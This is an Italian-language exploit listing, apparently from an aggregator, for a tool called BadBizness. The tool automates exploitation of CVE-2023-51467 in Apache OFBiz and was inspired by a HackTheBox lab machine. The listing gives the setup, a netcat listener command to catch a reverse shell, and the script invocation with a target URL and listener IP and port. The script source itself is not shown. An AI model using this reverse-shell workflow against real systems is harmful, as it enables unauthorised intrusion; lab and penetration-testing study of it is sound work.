## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAKEOTTE-BADBIZNESS-CVE-2023-51467

# BadBizness
Script di sfruttamento automatico per il framework web Java OF Biz sotto CVE-2023-51467. Ispirato alla macchina HackTheBox Bizness.
## Utilizzo ed Esempio
Questo script richiede lo strumento ysoserial e OpenJDK versione 11. Consulta il menu di utilizzo per l'installazione.
Configura un listener per catturare la shell con il metodo che preferisci. Ecco un esempio con netcat:
root@kitploit:~
nc -nlvp 1337
Esegui lo script:
root@kitploit:~
python3 badbizness.py [percorso a ysoserial-all.jar] [URL BASE DEL TARGET] [IP DEL LISTENER] [PORTA DEL LISTENER]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
## Dichiarazione di non responsabilità e Crediti
Questo strumento è stato creato come un modo per imparare di più su Python. Ringrazio script per avermi aiutato a fondo.